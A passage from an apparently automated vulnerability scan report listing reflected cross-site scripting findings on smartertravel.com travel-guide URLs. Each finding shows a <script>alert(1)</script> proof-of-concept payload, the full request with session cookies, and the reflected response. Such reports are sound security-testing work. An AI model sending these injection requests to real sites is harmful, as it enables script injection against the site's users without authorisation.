<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/orlando-travel-guide.html8afb8<script>alert(1)</script>3aad907230c</p>
...[SNIP]...

2.77. http://www.smartertravel.com/travel-guides/paris-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/paris-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b06ee<script>alert(1)</script>f39819beb0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guidesb06ee<script>alert(1)</script>f39819beb0e/paris-travel-guide.html?id=1143 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:52:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:53:12 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:53:12 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:53:12 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guidesb06ee<script>alert(1)</script>f39819beb0e/paris-travel-guide.html</p>
...[SNIP]...

2.78. http://www.smartertravel.com/travel-guides/paris-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/paris-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf057<script>alert(1)</script>a408ba3bcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/paris-travel-guide.htmlcf057<script>alert(1)</script>a408ba3bcf?id=1143 HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:54:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:54:44 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:54:44 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:54:44 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/paris-travel-guide.htmlcf057<script>alert(1)</script>a408ba3bcf</p>
...[SNIP]...

2.79. http://www.smartertravel.com/travel-guides/richmond-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/richmond-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa5f9<script>alert(1)</script>0bfb9b2ad84 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guidesfa5f9<script>alert(1)</script>0bfb9b2ad84/richmond-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:04:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:05:01 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:05:01 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:05:01 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guidesfa5f9<script>alert(1)</script>0bfb9b2ad84/richmond-travel-guide.html</p>
...[SNIP]...

2.80. http://www.smartertravel.com/travel-guides/richmond-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/richmond-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c175c<script>alert(1)</script>ac067d117cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/richmond-travel-guide.htmlc175c<script>alert(1)</script>ac067d117cf HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:05:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:05:08 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:05:08 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:05:08 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/richmond-travel-guide.htmlc175c<script>alert(1)</script>ac067d117cf</p>
...[SNIP]...

2.81. http://www.smartertravel.com/travel-guides/tokyo-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/tokyo-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ccdc5<script>alert(1)</script>b66a298fb97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guidesccdc5<script>alert(1)</script>b66a298fb97/tokyo-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:03:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:22 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:22 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:04:22 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guidesccdc5<script>alert(1)</script>b66a298fb97/tokyo-travel-guide.html</p>
...[SNIP]...

2.82. http://www.smartertravel.com/travel-guides/tokyo-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/tokyo-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92a56<script>alert(1)</script>6190220d71d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/tokyo-travel-guide.html92a56<script>alert(1)</script>6190220d71d HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 22:04:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:30 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 22:04:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 22:04:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/tokyo-travel-guide.html92a56<script>alert(1)</script>6190220d71d</p>
...[SNIP]...

2.83. http://www.smartertravel.com/travel-guides/tulsa-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/tulsa-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3fcf1<script>alert(1)</script>0b188fee293 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides3fcf1<script>alert(1)</script>0b188fee293/tulsa-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:55:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:55:20 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:55:20 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:55:20 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides3fcf1<script>alert(1)</script>0b188fee293/tulsa-travel-guide.html</p>
...[SNIP]...

2.84. http://www.smartertravel.com/travel-guides/tulsa-travel-guide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/tulsa-travel-guide.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 33c41<script>alert(1)</script>b1c72b271eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides/tulsa-travel-guide.html33c41<script>alert(1)</script>b1c72b271eb HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:55:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:55:52 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:55:52 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:55:52 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides/tulsa-travel-guide.html33c41<script>alert(1)</script>b1c72b271eb</p>
...[SNIP]...

2.85. http://www.smartertravel.com/travel-guides/williamsburg-travel-guide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /travel-guides/williamsburg-travel-guide.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f7d1<script>alert(1)</script>0b81058d224 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-guides4f7d1<script>alert(1)</script>0b81058d224/williamsburg-travel-guide.html HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 21:54:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:54:06 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 21:54:06 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 21:54:06 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/travel-guides4f7d1<script>alert(1)</script>0b81058d224/williamsburg-travel-guide.html</p>
...[SNIP]...

2.86. http://www.smartertravel.com/travel-guides/williamsburg-travel-guide.html [REST URL parameter 2]  previous  next

